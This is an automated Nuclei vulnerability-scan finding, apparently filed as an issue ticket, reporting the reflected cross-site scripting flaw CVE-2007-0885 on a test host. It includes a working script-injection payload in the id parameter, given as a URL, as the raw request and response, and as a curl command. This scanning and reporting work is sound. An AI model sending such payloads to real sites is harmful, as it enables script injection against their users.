Jira Rainbow.Zen - Cross-Site Scripting (CVE-2007-0885) found on honey.scanme.sh

Details: CVE-2007-0885 matched at honey.scanme.sh

Protocol: HTTP

Full URL: https://honey.scanme.sh/jira/secure/BrowseProject.jspa?id=%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3e

Timestamp: Tue Apr 30 19:26:14 +0530 IST 2024

Template Information

Key	Value
Name	Jira Rainbow.Zen - Cross-Site Scripting
Authors	geeknik
Tags	cve, cve2007, jira, xss, rainbow_portal
Severity	medium
Description	Jira Rainbow.Zen contains a cross-site scripting vulnerability via Jira/secure/BrowseProject.jspa which allows remote attackers to inject arbitrary web script or HTML via the id parameter.
Remediation	Apply the latest security patches or upgrade to a patched version of Jira Rainbow.Zen to mitigate the Cross-Site Scripting vulnerability.
CVSS-Metrics	CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P
CVE-ID	CVE-2007-0885
CVSS-Score	6.80
vendor	rainbow_portal
product	rainbow.zen

Request

GET /jira/secure/BrowseProject.jspa?id=%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3e HTTP/1.1
Host: honey.scanme.sh
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK
Connection: close
Content-Length: 284
Content-Type: text/html
Date: Tue, 30 Apr 2024 13:56:14 GMT

GET /jira/secure/BrowseProject.jspa?id="><script>alert(document.domain)</script> HTTP/1.1
Host: honey.scanme.sh
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0

References:

CURL command

curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0' 'https://honey.scanme.sh/jira/secure/BrowseProject.jspa?id=%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3e'

Generated by Nuclei v3.2.5

mkrs2404 / tickets

Jira Rainbow.Zen - Cross-Site Scripting (CVE-2007-0885) found on honey.scanme.sh #32